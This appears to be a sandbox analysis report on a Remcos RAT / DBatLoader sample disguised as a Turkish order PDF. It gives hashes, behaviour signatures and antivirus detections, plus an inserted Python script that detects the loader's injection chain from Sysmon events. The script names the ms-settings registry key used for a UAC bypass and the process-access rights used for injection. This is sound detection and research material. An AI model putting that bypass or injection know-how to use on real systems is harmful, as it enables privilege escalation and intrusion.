Windows Analysis Report
Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe

Overview

General Information

Sample Name: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe (the #U015f and #U0131 sequences are the sandbox's escaping of the Turkish letters ş, U+015F, and ı, U+0131; the decoded name "Yeni siparişi onaylayın" means "Confirm your new order", and the ",pdf.exe" ending is a double-extension lure that presents an executable as a PDF)
Analysis ID: 652390
MD5: 8e60c68e832622b0ebd88a612898a9f9
SHA1: 99c8a0db1608b7f3fe783829f13a6a594554f142
SHA256: 6f4628db14ddcff78f5b0ad2c62f6791e4b29901eb9ef8a3686a2b7019308a99
Tags: exegeoTUR

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Yara detected DBatLoader
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected UAC Bypass using ComputerDefaults
Contains functionality to capture and log keystrokes
Writes to foreign memory regions
Found stalling execution ending in API Sleep call
Contains functionality to steal Firefox passwords or cookies
Contains functionality to register a low level keyboard hook
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to inject code into remote processes
Contains functionality to change the wallpaper
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses dynamic DNS services
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate processes and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
IP address seen in connection with other malware
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Potential key logger detected (key state polling based)
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality to read data from the clipboard
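
Read together, the signatures above describe one chain: a dropper executed from C:\Users\Public\Libraries (the dropped file reported below as Eluiezilfw.exe), a registry hijack for the ComputerDefaults.exe auto-elevation bypass, a foreign process opened for write, and a thread started in it. The following Python is an added example, not code from this report or from Joe Sandbox: it correlates Sysmon-style events (Event IDs 1, 8, 10 and 13, with Sysmon's field names) into that chain so a detection engineer can see which fields each signature maps to. The events are constructed; PID 6552 comes from the report, while the loader PID 4100, the thread start address and every path other than the dropped file are assumptions.

```python
"""Correlate Sysmon-style events into the loader -> injection chain the report's
signatures describe.  Added example, not code from the report or from Joe Sandbox.
Field names follow Sysmon's schema (Event ID 1 ProcessCreate, 8 CreateRemoteThread,
10 ProcessAccess, 13 RegistryEvent).  ASSUMPTIONS: the events below are constructed;
PID 6552 is the report's, PID 4100, the start address and every path except the
dropped file C:\\Users\\Public\\Libraries\\Eluiezilfw.exe are made up here."""
from collections import defaultdict

DROP_DIRS = ("c:\\users\\public\\libraries\\",)  # drop folder seen in the report
# Protocol-handler key abused by the ComputerDefaults.exe (and fodhelper.exe) UAC
# bypass: the auto-elevated binary opens ms-settings: and runs whatever HKCU names.
MS_SETTINGS_KEY = "\\software\\classes\\ms-settings\\shell\\open\\command"
# winnt.h access rights an injector needs on the target process.
PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_WRITE = 0x2, 0x8, 0x20
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

DROPPER = "C:\\Users\\Public\\Libraries\\Eluiezilfw.exe"
TARGET = "C:\\Program Files\\Windows Media Player\\logagent.exe"  # path assumed
SAMPLE_EVENTS = [  # constructed telemetry mirroring the report's signatures
    {"EventID": 1, "ProcessId": 4100, "Image": DROPPER,
     "ParentImage": "C:\\Users\\user\\Desktop\\Yeni siparişi onaylayın - TK176H,pdf.exe"},
    {"EventID": 13, "ProcessId": 4100, "Image": DROPPER, "Details": DROPPER,
     "TargetObject": "HKU\\S-1-5-21-1111111111-2222222222-3333333333-1001"
                     "\\Software\\Classes\\ms-settings\\shell\\open\\command\\(Default)"},
    {"EventID": 10, "SourceProcessId": 4100, "SourceImage": DROPPER,
     "TargetProcessId": 6552, "TargetImage": TARGET, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 8, "SourceProcessId": 4100, "SourceImage": DROPPER,
     "TargetProcessId": 6552, "TargetImage": TARGET, "StartAddress": "0x0040B2A0"},
    # benign noise: a query-only handle (PROCESS_QUERY_LIMITED_INFORMATION = 0x1000)
    {"EventID": 10, "SourceProcessId": 900, "SourceImage": "C:\\Windows\\System32\\Taskmgr.exe",
     "TargetProcessId": 6552, "TargetImage": TARGET, "GrantedAccess": "0x1000"},
]


def _norm(path):
    return (path or "").lower()


def _rules_for(ev):
    """Yield (rule, source_pid, target_pid) for every rule an event trips."""
    eid = ev["EventID"]
    if eid == 1 and _norm(ev["Image"]).startswith(DROP_DIRS):
        yield "exec_from_public_libraries", ev["ProcessId"], None
    if eid == 13 and MS_SETTINGS_KEY in _norm(ev["TargetObject"]):
        yield "ms_settings_handler_hijack", ev["ProcessId"], None
    if eid in (8, 10) and _norm(ev["SourceImage"]) != _norm(ev["TargetImage"]):
        if eid == 8:
            yield "remote_thread_created", ev["SourceProcessId"], ev["TargetProcessId"]
        elif (int(ev["GrantedAccess"], 16) & INJECT_MASK) == INJECT_MASK:
            yield "write_access_to_foreign_process", ev["SourceProcessId"], ev["TargetProcessId"]


def correlate(events):
    """Map each source PID to the rules it tripped and, per target PID, which ones."""
    findings = defaultdict(lambda: {"rules": set(), "targets": defaultdict(set)})
    for ev in events:
        for rule, src, tgt in _rules_for(ev):
            findings[src]["rules"].add(rule)
            if tgt is not None:
                findings[src]["targets"][tgt].add(rule)
    return dict(findings)


def injection_chains(events):
    """(source, target) PID pairs where one process both opened another for write
    and started a thread in it: 'Writes to foreign memory regions' + 'thread injection'."""
    needed = {"write_access_to_foreign_process", "remote_thread_created"}
    return [(src, tgt) for src, info in sorted(correlate(events).items())
            for tgt, rules in sorted(info["targets"].items()) if needed <= rules]


def verdict(events):
    """Loader-style verdict per source PID: an injector that also ran from the drop
    folder or touched the ms-settings handler is treated as the loader stage."""
    injectors = {src for src, _ in injection_chains(events)}
    out = {}
    for src, info in correlate(events).items():
        staged = bool(info["rules"] & {"exec_from_public_libraries", "ms_settings_handler_hijack"})
        if src in injectors:
            out[src] = "loader+injector" if staged else "injector"
        else:
            out[src] = "suspicious" if staged else "benign"
    return out


if __name__ == "__main__":
    for pid, v in sorted(verdict(SAMPLE_EVENTS).items()):
        print(pid, v, sorted(correlate(SAMPLE_EVENTS)[pid]["rules"]))
```

The query-only Taskmgr handle is deliberately kept in the sample: a ProcessAccess rule that alerts on any handle to logagent.exe is noise, while requiring the VM_WRITE | VM_OPERATION | CREATE_THREAD bits and a different source image isolates the injector.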

AV Detection

Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe ReversingLabs: Detection: 21%
Source: Yara match File source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: logagent.exe PID: 6552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DpiScaling.exe PID: 5936, type: MEMORYSTR
Source: C:\Users\Public\Libraries\Eluiezilfw.exe ReversingLabs: Detection: 21%
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396c008.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4348.64.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acbbdc.14.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962dac.51.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 3.2.logagent.exe.400000.0.unpack Avira: Label: BDS/Backdoor.Gen
Source: 13.3.Eluiezilfw.exe.3ac5ecc.84.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39600d8.18.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac1b54.30.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac0168.21.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.logagent.exe.10540000.2.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39717a0.68.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397dbec.69.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac7bf0.17.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac413c.59.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac3034.55.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3984008.36.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad28f8.32.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397afd8.34.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962d80.39.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad8008.106.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac0168.20.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad17a0.66.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac8560.26.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad9a8c.88.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.2324788.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac00d8.18.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac803c.108.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3adbf00.62.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3adafd8.34.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 15.0.DpiScaling.exe.10540000.3.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 13.3.Eluiezilfw.exe.3ad54e0.103.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acd700.50.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad001c.61.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acff08.23.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acc008.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966c84.100.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397afd8.37.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3addbec.69.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac6d08.106.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac7bf0.16.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3960168.22.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4578.12.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac52c8.8.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.10540000.8.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964ae4.70.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac0168.20.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac217c.47.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39754e0.101.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.logagent.exe.10540000.3.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.3.Eluiezilfw.exe.3ad54e0.103.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac2dac.51.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3974008.91.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.Eluiezilfw.exe.23a33e8.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39728f8.32.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac6924.76.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395e240.8.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acc6a8.43.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac52c8.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad94ec.80.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395dda4.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3adf8dc.45.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3adbf00.63.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac704c.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acbbdc.14.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396dc40.56.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad3e08.79.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6d08.105.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acc6a8.43.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.logagent.exe.10540000.0.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966d08.105.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad94ec.80.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad94ec.82.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.logagent.exe.10540000.1.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.2.Eluiezilfw.exe.3168bd8.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396bbdc.13.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac217c.47.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad4008.91.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.Eluiezilfw.exe.10540000.8.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966588.94.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac2d80.39.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396217c.48.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396c008.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac00d8.19.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acdc40.54.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3add83c.75.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac26fc.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac8008.21.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac26fc.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.logagent.exe.10540000.2.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 13.3.Eluiezilfw.exe.3ae4008.36.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac03a8.25.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.logagent.exe.10540000.1.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.3.Eluiezilfw.exe.3ac1b54.29.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962d80.40.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acbbdc.13.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396704c.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3add83c.75.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3965ee4.92.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac4578.12.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acc008.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.logagent.exe.10540000.3.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.3.Eluiezilfw.exe.3ac26fc.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39603a8.25.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad5fb8.44.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.logagent.exe.10540000.1.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.3.Eluiezilfw.exe.3ac217c.48.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac2d80.39.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3add83c.74.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad5fb8.42.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3adbf00.63.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad4008.93.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39746cc.96.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acd700.52.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3961b54.29.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964578.10.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad46cc.98.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3aca22c.30.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acff08.23.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966d08.104.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3978008.107.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.Eluiezilfw.exe.2364588.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39626fc.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac52c8.8.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acc6a8.41.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac03a8.27.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 3.2.logagent.exe.1054198f.2.unpack Avira: Label: BDS/Backdoor.Gen
Source: 13.3.Eluiezilfw.exe.3ad54e0.102.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397bf00.62.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396c6a8.41.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397001c.60.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac2dac.49.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3984008.38.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4ae4.72.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3addbec.68.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac2d80.40.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acd700.52.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad46cc.95.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966c84.102.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.logagent.exe.1054198f.2.unpack Avira: Label: BDS/Backdoor.Gen
Source: 8.3.Eluiezilfw.exe.3ad3e08.77.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3adf8dc.46.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac0024.15.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ae2814.97.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac8560.26.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac1b54.29.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396dc40.54.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac5ee4.92.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396d700.50.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396bbdc.14.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396c6a8.43.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397f8dc.46.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3982814.99.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acdc40.55.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 15.0.DpiScaling.exe.10540000.1.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 13.3.Eluiezilfw.exe.3ac4ae4.72.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39717a0.66.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3973e08.78.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3abe240.7.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3960168.20.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3adf8dc.46.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac7bf0.16.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396a22c.30.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3add83c.73.unpack Avira: Label: TR/Patched.Ren.Gen
